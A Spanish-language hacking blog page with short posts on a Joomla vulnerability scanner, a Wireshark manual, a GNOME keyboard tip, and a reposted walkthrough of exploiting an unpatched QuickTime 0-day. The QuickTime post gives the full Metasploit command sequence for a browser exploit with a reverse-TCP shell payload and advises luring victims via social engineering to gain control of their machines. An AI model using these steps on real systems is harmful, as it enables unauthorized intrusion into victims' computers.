    Interesante aplicación que sin duda utilizaría si dentro de mis objetivos esta una web Joomla. Además que el autor asegura que se actualiza.
    El programa al arrancarse comprueba si hay nuevas versiones o actualizaciones de la base de datos, de manera que cada vez que suba un nuevo bug se actualizará sólo.









    Descarga de Joomla Scan v1.2

    Fuente y web del autor: http://blog.pepelux.org/

    También pepelux realizó una versión en perl de esta herramienta para los amantes de la consola o para los usuarios de GNU/Linux, también dispone con actualizaciones.






    Descarga de Joomla Scan v1.1 en perl

    Fuente: http://blog.pepelux.org/

    Explotando con Metasploit el 0-day en QuickTime

    Bueno... Este es un texto bastante interesante realizada por SeguridadApple donde nos enseña a sacarle provecho al 0-day descubierto hace poco en QuickTime con Metasploit.


    En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).


    Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:
    •  use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
    • set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
    • set SRVPORT 80 (Puerto local del servicio) 
    •  set URIPATH juegos (Uri del servicio)
    • set payload windows/shell/reverse_tcp (Payload que vamos a utilizar) 
    •  set LHOST 192.168.0.162 (IP donde se conectará la víctima) 
    •  set LPORT 5050 (Puerto local de escucha) 
    •   exploit (Ejecutamos el exploit)
    Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.


    Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.


    Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.


    Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

    •  sessions -i 2
    De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.


    Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

    Autor: SeguridadApple
    Fuente: http://www.seguridadapple.com/

    [Wireshark] Manual


    Bueno... Les traigo un Manual bastante interesante sobre Wireshark de D14M4NT3 en donde nos enseña como leer paquetes de una red, como utilizar los filtros, como leer una conversación del MSN con Wireshark, como robar Passwords que viajan en texto plano, etc…

    El texto es bastante bueno como introducción a Wireshark ya que empieza de lo básico y es bastante explicativo e ilustrativo.

    Manual Wireshark
    Autor: D14M4NT3
    Formato: PDF
    Páginas: 7
    Peso: 432 KB

    Fuente y web del autor: http://d14m4nt3.wordpress.com/

    3 sept 2010

    Como usar la tecla de Windows para abrir el menu de Gnome

    Bueno... es eso simplemente XD.

    Lo encontré bastante interesante. Consiste en darle un uso útil a la tecla de Windows en un sistema GNU/Linux, cumpliendo casi el mismo rol que en Win OS.

    Para hacer esto solo debemos poner en una consola (como tu usuario normal), lo siguiente:
    gconftool-2 –set /apps/metacity/global_keybindings/panel_main_menu –type string “Super_L”

    Con eso bastara, ahora si deseas revertir el cambio debemos poner lo siguiente:
    gconftool-2 –unset /apps/metacity/global_keybindings/panel_main_menu “Super_L”

    Ese sería el tip :D.

    Fuente original: http://www.rinconinformatico.net/

    Labels

    0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

     
    biz.